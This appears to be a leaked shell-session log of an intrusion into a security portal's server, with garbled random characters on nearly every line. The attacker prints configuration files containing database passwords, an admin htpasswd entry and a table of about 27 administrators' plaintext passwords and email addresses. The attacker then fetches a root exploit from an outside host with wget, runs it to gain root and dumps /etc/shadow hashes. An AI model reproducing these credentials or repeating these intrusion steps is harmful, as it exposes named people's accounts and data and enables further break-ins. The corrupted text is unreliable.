drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql4 ~- x8 \$ z5 Q* Y) b; `) J" Q
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com3 m( Z( h' Q; o) Y, F/ |$ D* d( e
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend7 M; _. O9 }+ S0 J
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner- E" y. @( M! i+ |9 |5 q
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg$ W& W, J A- E6 m \/ S
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config& v) j4 m r8 l7 m) Z: C
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron7 B1 ]* [$ O0 U0 Z
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd% \9 M! l4 C% c8 U- J- l4 M
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php2 H1 i! E! h7 V. x# w
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico% p2 F4 @# H) S+ h+ a/ _. @
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
7 t" w9 D- p" d/ ddrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
& l. y5 I- m k2 R- {6 K$ W# C-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess8 [, M# m% J0 m) x
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess% M3 M; T# V1 k6 @! t
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
4 ]1 ^8 \1 t: F-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html# q) I; I. z* g+ m" {" D
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php' @& n4 C* n y% ?2 ~
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php. n) I! P* {# W
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf; z9 V+ z" J8 {
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
; V( I. i0 k1 ]* A" i; Vdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang) k- V- ?' U; _/ n& C- V
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
9 L1 Y2 c2 n Hdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log' t% r, ]' f9 h1 N
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member9 `% t# H% E2 l+ _) |, C( x
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata0 W% X; D+ v) F: S5 X6 P2 Z
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new+ r# o) K( Y) m O3 f& [6 C
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
' g/ a$ w* c, {, `drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
0 L0 T I; O& v-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
* @& J d" \ {# j6 r. Kdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss1 }; y0 E3 n& ]% }% l) E0 e
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
+ ]& k# t3 a8 s! V% s1 r s( }drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
: O. ?; P, T$ |3 N' jdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
! O' X5 Y, z, Kdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src* t6 g# C6 t/ s+ Z% u( d% w
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl1 `% W# L& U" n4 u( a' q2 U
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2/ \0 m' ]$ Y# L$ ^9 ?( @) c2 u
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
4 m9 `+ q ?- M" p6 C1 H-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php8 R8 r7 g* i% A% a: L! g& V$ m
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
) x8 c7 \. R" j. o! M3 l
% C* Y0 `8 M& F9 N" zsh-3.2$ head -20 index.php; L: U5 l4 @3 V! h7 V
<?PHP2 V; D- h* I6 @' t1 h* ?( d+ P
/**" e( f, m R, k" i. L d$ `* c
* Mainfile (external) for astalavistaNET v2.0
. C5 t" I7 V2 d*% ~9 a& M/ }. C. L
* @copyright Astalavista IT Engineering GmbH
$ l8 c& p$ p9 b7 R* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch># A8 m8 E3 i3 |$ |' S7 q9 B+ l2 x6 @
* @version 1.0
) Y! P; w6 t% {0 V; H+ v5 w*/
5 p/ ?9 R+ f H$ h7 O5 c
& ]3 d' Y8 Q- N& u" c( B/ h- S if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) { p4 z. a$ M# S/ |
$dontStartSession = false;
( ~" t4 k8 Q" Q" Y7 Z" X9 Z# Q/ L4 N } else {% F: Q- A* j/ z( X( \) X! W! T
$dontStartSession = true;: U+ R0 D d& [( U! w
}3 b$ T0 E; W5 ?
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);/ E* s' p0 |4 N* q2 ^
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
$ y8 s, a2 n- t F$ [; J D+ H require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);* U- [, p# \7 S2 c: |$ Z
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);3 F0 @+ j. _- I0 b% ?2 n" w; \' N
0 T' }- R: G9 q* h/ Q& Ssh-3.2$ cd config
( j" ^( K8 u: B* U- ~: T- b0 esh-3.2$ ls -la
& _0 s# m, e3 R/ p1 o/ }. T" ltotal 32* x9 h5 C2 {7 Y- Y" o% F- F
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .# E: C+ P. Q( c- q" N% K
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..5 y& A# v6 f+ m1 Q7 D
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php0 @3 v$ u. {; F0 {
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php. F3 Z! o) ? w+ r
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php' r5 b1 [1 r0 t) E
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php+ p* J4 k7 `2 l* D
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
$ Z9 F$ l3 A" }' R$ J( e1 r. E' t' [' ~) V) P' z w
sh-3.2$ cat com.conf.php* k9 S- A9 v( {; H4 f, R. N% L
[snip]
- ~. x7 X' a, O1 n. p//member-database
4 V2 [7 v* C) y- V; q$_CONFIG['db_mem_server'] = ‘localhost’;
f6 Z7 d$ |5 z6 T$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;0 H ^& l2 U. h0 F* l9 Z
$_CONFIG['db_mem_user'] = ‘astanet_db’;" k; ]1 v- E* ]; J
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;2 f+ V4 ~% H6 b; Z/ O
$_CONFIG['db_mem_debug'] = false; //true or false
3 j/ `8 `; w I5 Q2 V3 y( Z! j//ads-database
& z+ X( B$ N8 ]2 T* n2 F$_CONFIG['db_ads_server'] = ‘localhost’;/ U& q, T+ k0 g% l
$_CONFIG['db_ads_database'] = ‘astanet_ads’;4 E; ~8 W' K4 ?1 c
$_CONFIG['db_ads_user'] = ‘astanet_db’;
2 Z: A+ H9 C( j' u2 R8 ?' b$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;' Q2 N9 b1 {0 ^
$_CONFIG['db_ads_debug'] = false; //true or false
( t7 ^+ q* u* k: l) d, V//rainbow-database
; _' r& F3 K* Z! f* i& r$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
4 y* [5 r9 u* o) D6 L$_CONFIG['db_rainbow_database'] = ‘rainbow’;$ D) r, r& W) Q0 G- c# n6 C
$_CONFIG['db_rainbow_user'] = ‘dinu’;
7 S7 z9 b5 d, o. x2 v3 |" n$_CONFIG['db_rainbow_password'] = ‘dinudinu’;4 I0 N- J+ E1 ~7 o* v7 c* p
$_CONFIG['db_rainbow_debug'] = false; //true or false( m7 i: V. p, L f1 I
//mailing lists database
3 s* _( ?+ F. _6 z$_CONFIG['db_mailing_lists_server'] = ‘localhost’;2 O1 c. `0 k2 A0 P0 P" j7 y6 i9 C; Q
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
K2 z1 T1 x8 ?$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
- B, Z; U; y- i7 M4 E2 M6 y$ {$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
m- o7 U H9 I4 H$_CONFIG['db_mailing_lists_debug'] = false; //true or false" B0 k$ R" h0 \! s" f
//paypal
2 M& `6 U- G) V( D( J( X1 y$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
# H8 u4 X" U6 B9 {2 [; m$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
, A+ U" Z; m0 r6 K) C. p. a$ R$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;' j8 R- \1 |/ B5 ]" [
$_CONFIG['sub_pp_noship'] = ‘1′;) X' p0 H9 v$ _1 v0 S0 ~
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;* ?3 H8 z/ a3 k, d# x4 R
[snip]
' V# l& G! J/ e, B# A# a6 `- _" n) T( c0 F' `
sh-3.2$ cd ..
. T5 O8 \& `8 B: Ysh-3.2$ cd member
" F) J8 P( z/ w: t6 p* Vsh-3.2$ ls -la
* ?2 E* c& |. w$ j5 O9 H$ g& |total 20/ R. b. ?5 }0 b$ X3 q
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
) ?' L& ?( b+ l0 `. F* pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
# ]+ s) _" c' b" m+ _-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess% F/ v- R( G" ]7 \7 |
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php1 u9 i4 S( h1 R8 n3 R) C, ^: o4 j
sh-3.2$ cat .htaccess
6 d3 ^3 G: e0 O$ E( ASecFilterEngine off$ s# L. E. c. T' C% ?4 @6 a! [: T- N
' f" R7 M# r* S% P& K$ j6 s9 M
sh-3.2$ cd ..
% H+ V# c9 |% }8 b! m2 Psh-3.2$ cd cron
. l J8 |, |( B6 @5 [sh-3.2$ ls -la3 [% |+ G* X" Y) e5 u6 Y; ]
total 168& y* M) z& O' x0 W' A
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .; x! g9 v: Q( {* w/ o
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
! ]0 S, M+ F9 Q3 g6 `( a, X! B-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
' N1 E- q @6 _; }) j' P r- g-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php ~; [* L( a, B1 |' T) q
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
3 I! H7 q4 o, a-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php8 C6 w/ L: O6 B1 c
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
' T6 G7 O, ^. j9 h9 J! i, e-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
+ ^3 O- c/ Z' ] t5 u8 V( ~: R-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php: ^, ^$ s0 }& ~ o- k
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php f+ k/ X& I; T1 X; G3 I
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh* M) v9 C8 z p- \3 s
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
" H' e, c4 Z+ {0 G5 g% E* e-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
: g4 U- i" a2 P-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
4 C% z" Z5 o, G$ ]-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
, d; p- \" `& \% [! U$ p$ Q-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php4 d2 ]: ?( L! q/ l* R, E9 @& X
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php; z6 R# x* U! m, ^
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
3 F7 j& D2 _# k9 v5 ^% J-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
; t7 a' t, f6 @) n" s' r7 ~% R* i. x-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php/ m; T! {" b% x6 h8 ^
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email* q2 p. g+ K; u. Z* G" { h6 [3 t
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php0 K. q0 M7 H0 D J$ o X; |
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php ` V3 U) F$ o9 J* I1 ]' a
# u8 {* c8 l1 K* X6 g( }* Q- g& @sh-3.2$ cd ..
. Q; J$ }5 b) v' ssh-3.2$ cd _007$ F! X8 V! ~' e6 t0 \
sh-3.2$ ls -la
. `/ n# ~% M T9 \! M1 qtotal 24+ O2 F1 D4 u/ Z) _1 Y
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
N |+ C' A, `" X7 Q( C0 Vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..* ~$ ~6 C" R0 p3 r6 g& v& y7 ?; b
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
7 g- o+ h$ K7 B. B/ O+ N-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php) Y; X' L" E- r7 f
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
R1 O4 P0 ]4 n' ^. j, y. ndrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
0 r+ W0 e" k! Q+ n1 \' ^6 I5 e8 [
$ f2 Z1 ^) Z- J. R% y* z ^, jsh-3.2$ cat .htaccess3 z' j; }/ h2 Y5 N" W! q6 ~9 `
authType Basic8 t- I5 f0 Y) `- O3 r( j- a
authName Admin. O6 d% N' `) p
authUserFile /home/astanet/auth/.htadm_pwd* a, h. E( @. m4 x
require valid-user5 O+ N' o4 m: s# k. b3 O
1 Q; t4 [* v* Q* f
sh-3.2$ cat /home/astanet/auth/.htadm_pwd! i: V9 V/ A8 y' |, t/ ^
admin2net:CR0bl65MwhfT) y1 `; M% O$ ^7 H9 M
% ~! w7 |& V# r" `2 Bsh-3.2$ mysql -u astanet_db -p e# E! G; b4 b+ j
Enter password:
! I+ W* O! U* ^Welcome to the MySQL monitor. Commands end with ; or \g.3 S( F8 E2 x; }. E
Your MySQL connection id is 275153+ h2 ~$ ~) l, m& j6 s
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* Q/ T1 h5 [) s2 F3 S. S& p) ~4 ?; m' M3 A. T: |+ [+ [. p
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
5 d& p# u$ ]' Q; y, r0 ^
* O8 t9 w3 W0 q& I/ [1 R4 u0 Vmysql> show databases;
B2 C2 K1 ^. o; R# p+———————–+( l) ^3 u4 h$ O; x+ `- y {/ L* l
| Database |
- \8 ?( D7 U3 {' c" o+———————–+
% T T6 t/ R: J/ Z0 m| information_schema |1 J; J4 L, {+ c
| astanet_ads |
5 I# i! K6 Q! ~$ V N( |, Y U| astanet_mailing_lists |
- ^# i" t3 m/ Y+ P| astanet_mediawiki |$ z( N& i5 F4 K; ]! _, ~) F( b
| astanet_membersystem |
6 x9 G- v4 u* t+ j$ F+ `| test |
) w6 P# \* H7 l u m4 o: M K+———————–+
7 [4 V, D8 i3 T4 G3 g( n6 rows in set (0.00 sec)
& E: y8 T9 {; V. O8 F. I4 v: f3 C# `) O7 l& {
mysql> use astanet_membersystem. ?& C; {: d( ?- C0 g1 J& h
Database changed; U) I* G7 |! I7 g$ Q" x
mysql> show tables;
/ K) l0 l' }* h7 T8 n+ F: e9 j+———————————–+
, t6 x* ?: @: n! y4 o9 F| Tables_in_astanet_membersystem |% f1 N" Y: T% A @0 }
+———————————–+: E3 ]8 D/ T* P6 F) |- i* @
| blacklist_categories |" ]' h4 D3 i: V6 M7 t0 D2 h8 R
| blacklist_content |) I4 c* ]) ~! t: J0 D* O
| blacklist_levels |9 j* ^8 M) g* x0 [6 L- c
| blacklist_mcset |& v/ F7 P/ P9 ~& L: S
| dir_categories |3 [4 {/ S; d" o9 Y. d
| dir_comments |
H4 d6 R8 `7 ?# k3 p" w| dir_links |
" ^* e. E: F, e7 C# Z0 W" X| dir_temp |& `4 ?) z6 s& ^$ z7 f: ]/ Q
| dir_votes |) ^- b Z: l. U
| documents |
* R. p6 j3 W m" h0 T| documents_categories |
1 R# G: R1 {1 a) n0 m| email_content |/ |- ]7 u0 f; {& ]/ `
| email_settings |
# H. N7 h: m) h| exploits |, [( A3 d, |$ A$ u. d
| exploits_categories |
3 U/ }+ e. G @, A& O1 ?: b| exploittree_categories |
( q/ `5 U3 d: U0 b| exploittree_exploits |* T8 @ u# ]( w+ |/ k2 O( c! A3 }
| home_values |
# e+ `1 P& Y/ w) H! ]. {7 S3 s| iso_countries |; b9 p; J; p: X# m9 p8 x. J
| links_categories |3 k; ^8 M3 ]4 Y2 i
| links_records |
2 |# `( h# ]3 W0 O0 U8 @; {/ r, X| links_unauth |5 I, l. q% j3 r* k( t
| links_votes |, { m" c% I0 f8 N
| log |
8 j7 m( o/ `) |1 S. x| news_categories |
# ~" n" T. m4 u7 Q3 T| news_comments |
0 a# C& n9 k$ S7 p0 M. o% y| news_emoticons |
. `4 s) _9 Y& p/ p| news_latest |
6 ^/ u5 N$ }" o9 B" O( L| news_messages |
& S5 ~5 L. v9 r( Z; Y7 n7 ?; ^) v| news_statistics |
5 @7 s% O+ V0 ]: D| news_votes |
! l) N, M8 x( c% ?3 g" B| prices_content |
! e0 c$ F+ p/ x7 T z1 H| prices_offers |2 q; j* u0 P$ }+ G3 B1 I( K3 g" r: j3 r
| rss_settings |
P9 y3 P2 W, y% Y5 B| sessions |
, p( V6 Q2 F- r! a- O+ y" I| stats_signups |7 B& d# O8 p7 ^ K8 g
| u2u2 |% i% r3 H n) V- i2 ^5 ?
| u2u_contact |2 \+ e0 D; l5 x4 h# ^2 J7 d
| u2u_settings |
/ C+ L& b) g, }| user_keywords_selected_categories |
9 A/ Y4 o) {6 O* t| users |2 N* V% N7 n5 _/ X, H$ z
| users_ipn_test |
5 [ y h( Y. I| users_keyword_values |' z% b/ B+ N* U, Q" u% q
| users_profile |5 U7 e/ L0 \+ V [
| users_temp |
" ^8 T; U5 ]# l7 o, J| users_upgrade |
' \5 I. Z0 Q7 H; Q- |# C( Q+———————————–+1 [" {" E7 q/ {7 J" b; N
46 rows in set (0.00 sec)
K7 y- Q+ P" m2 G7 j
$ W2 L+ u$ x! k8 S# k/ g# [! vmysql> describe users;1 `* p8 Q) h; j# V* x6 C
+————————–+————————————–+——+—–+———————+—————-+
k2 m9 |% h7 R! q| Field | Type | Null | Key | Default | Extra |
" b8 \0 U5 H6 S) l$ t) z/ ^5 H2 N+ c& \+————————–+————————————–+——+—–+———————+—————-+0 w. }, q4 m0 u- e) k) v8 x. k
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
) ?8 l. _$ [! F! Z/ b; Z& ]| user | varchar(50) | NO | | | |; Y. Z; i6 H: v Z# D
| nickname | varchar(30) | NO | MUL | anonymous | |* e' Q8 A$ E' Z- s; J) t, F0 g6 k- k
| password | varchar(30) | NO | | | |
* w# V' E) H) |/ H| userlevel | tinyint(3) | YES | MUL | NULL | |0 m# y8 \: ?; F& K- p8 y5 e
| exp | int(8) unsigned | NO | | 0 | |
2 S' Y) [$ u2 V& M| email | varchar(50) | NO | | | |
9 @4 W0 a6 p4 s! ^' r| ip | varchar(15) | NO | | 0 | |
" A1 E2 d0 C& ^8 I5 \6 t4 P| proxy | set(’0′,’1′) | NO | | 0 | |1 G; H/ H% J* u4 e& S. O
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |/ ]# `; f: U' u6 F+ Z
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
6 F$ P z' s% b e) f4 j; l| anz_in | tinyint(1) | NO | | -1 | |
1 \% e! l \) P0 h I, o; i| status | tinyint(1) unsigned | NO | | 0 | |* E, _ k2 G3 n( K4 w; g
| checked | set(’0′,’1′,’2′) | NO | | 0 | |/ _1 a3 U6 `; g% e" f9 ?
| freemember | set(’0′,’1′) | NO | | 0 | |
4 w# N. D9 P) g" }| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |8 p( g' o0 e8 z6 d6 S
| lang | tinytext | NO | | | |
/ T) o# k. s$ e| adid | smallint(6) | NO | | 0 | |% ^$ m: t( Y1 z3 ~* ^
| pp_txn_id | varchar(255) | YES | | NULL | |* f: P3 H* h, i1 k, M5 `3 B
| cnb_transaction_id | varchar(255) | YES | | NULL | |
7 D: _# Q" _: s3 Y: O| cnb_order_id | varchar(255) | YES | | NULL | |
5 `9 ^0 H& @2 @% @% i. T3 m: d; E| cnb_user_id | int(11) | YES | | 0 | |4 @8 B! @6 ~( N, f3 i' L
+————————–+————————————–+——+—–+———————+—————-+
$ N: m% a4 A, s- B( w22 rows in set (0.01 sec)
# M$ x9 ?$ O! L5 V" Z5 K" C! v
. k+ K2 D3 S8 w' f; ~7 X8 z! f) Vmysql> select count(*) as skids from users;
0 ^' I+ ^/ j$ V9 G: E+——-+
, z7 t. y) e5 Z* l| skids |" _) F$ e) I, K: ?! s5 v
+——-+) J- L- J, w1 C2 I3 u8 q% D
| 25199 |
1 { r3 p+ F0 K; e9 z5 d+——-+) I5 ?2 R" w) g- q: u+ M9 S+ h
1 row in set (0.00 sec); R3 O5 U% T- Z; r* z" w1 l
6 j! G0 n8 C, Q: A4 K6 Kmysql> select user,nickname,password,email from users where userlevel = 1;, ]: c. c4 A9 s
+————————–+———————-+——————+———————————–++ v* V" v7 J/ `/ z
| user | nickname | password | email |
3 Z$ p1 y2 Y* Z5 p+ M3 Q+ V8 w$ a+————————–+———————-+——————+———————————–+9 w2 L' [; O8 ^0 g0 A/ X! t
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
4 F5 a) j- n5 C" Q6 h/ V5 B$ `6 x| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |) n; u, |0 T! {: w/ t/ L6 l% F
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
0 {( N/ a5 A+ Z9 j) ^; I| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |0 H, c' ~3 c* h$ v- f3 B$ O% }. W
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
! j9 }9 n1 T. g| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |9 o2 X) U1 h6 \: Z/ i
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
) n; D; g2 W3 g| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |2 N' a8 X2 I0 x
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |2 ^. W2 ]; t9 ^& d4 q
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
3 {8 r y, k" C2 m+ y| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
/ h; B/ f4 p4 E8 k5 K1 ^$ {| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
6 Y1 ]! A$ m6 j: h% O$ s| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |0 e0 k( s7 z0 F I+ U! g7 @
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |! l$ \& [* b( P1 v
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |. W5 X9 Y8 i( M. v+ q
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
( s* |5 R8 G: Q, K| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |4 \7 A5 C1 Q1 q: D- P
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |4 C8 ]9 H5 p0 y* T- e
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |$ g0 _' O0 m: g. T/ p! H0 R
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |/ X8 b! T0 m) N3 o
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
9 D) `; I. B3 V! e8 Q| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com | `8 a# d g# f% F5 j
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |) N$ F. o( g1 ]
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
" ~' g, I/ y( m2 O2 r1 N' d| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |# e" y* b: L3 Y) w, T" K
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |) d% m' b6 {0 x2 j- K. \$ g
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
/ F; _) m1 F( F# j6 v& x+————————–+———————-+——————+———————————–+
+ k4 q3 I, R( b* w! [3 w/ F27 rows in set (0.00 sec)' I* p/ n# X7 d
4 J) D% R, b5 k: J# |mysql> exit;
5 ^! h8 j" d! e& D8 }3 d- b9 yBye
( l1 @3 E1 B' s- w3 N' I) {
& } }# @+ ~/ P$ t[~] plaintext passwords? yes,, X( W4 c) C2 S! y+ ]9 r
Those so called “security professionals” who charge you $6.66 / month to2 Z* H* U- W% o: ^4 B
register at their hack-proof portal, save your passwords in plaintext…0 p4 U; O0 t5 {! o' `3 f
brilliant!+ {7 Y( s4 [& R! a/ o% _
6 g; D9 F* O, V* j[~] This been fun but we want more.
5 D: D4 c/ L$ D8 O: w
" S0 Z8 ?/ t+ m5 Ysh-3.2$ uname -a
2 q8 k% g' P+ N" h1 g6 E/ \! ALinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
# b. g+ I7 r& Y c, A1 [sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]- e. ^% ~8 }0 G
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
2 c; r8 ?8 B8 `; n" UResolving anti.sec.labs… 13.33.33.37! i( t( O2 a v3 C% m* ~
Connecting to anti.sec.labs|13.33.33.37|:80… connected.5 S# [- H! y( V% Q
HTTP request sent, awaiting response… 200 OK r! q5 I2 _/ T% v( q, o/ r
Length: 18200 (18K) [text/plain]' M1 ?3 J) d& Z- \) t4 v2 d
Saving to: `g0troot’
9 }2 G* V; W3 E' {+ u. _9 A) u8 X5 o$ m1 i
100%[=========================================================================================================================================>] 18,200 58.6K/s in6 p+ h: i& J% b) s2 [( j" _
0.3s
C6 a0 _6 E, Q& a3 ?/ D; m2 g, I% X
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]* b% r+ q2 j, ~
( T- I$ P. p6 U) @2 jsh-3.2$ ./g0troot -i x86_64
, g' n+ ~+ G$ u$ s[+] g0troot - anti.sec.labs2 R3 Y; U3 C* j2 J) Z% S* }
[+] Target: 2.6.18-128.1.10.el5
' v, n# J6 L& c6 M& \4 {% }0 Y5 N% J[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]$ o! z6 b& I. p$ S0 c+ v
7 y. ]( H% x: o9 q) ]' W, B. Q[+] r00tr00t
! }9 e% T' r3 U% _7 n0 ?[~] Executing shell…
( G( I& _3 r0 ]+ E& c! W( p) E' e4 Z0 A8 Y
sh-3.2# id
5 I8 c# b6 ^8 tuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
9 h2 [( S6 B% M( L8 D9 u# J% i5 _/ d$ Z' ]1 \
sh-3.2# cat /etc/shadow
% g+ X$ G+ J! E; G; Groot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
2 \) z! R, |# K3 k& R/ q' Q- U- Z0 g) f6 p[snip]
$ k4 ?1 |, ~- K+ |- L) sadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
( K q+ N! o/ P& G" M: Djon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7::: Z$ w! F3 {, U% e/ N; Q" `2 P
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
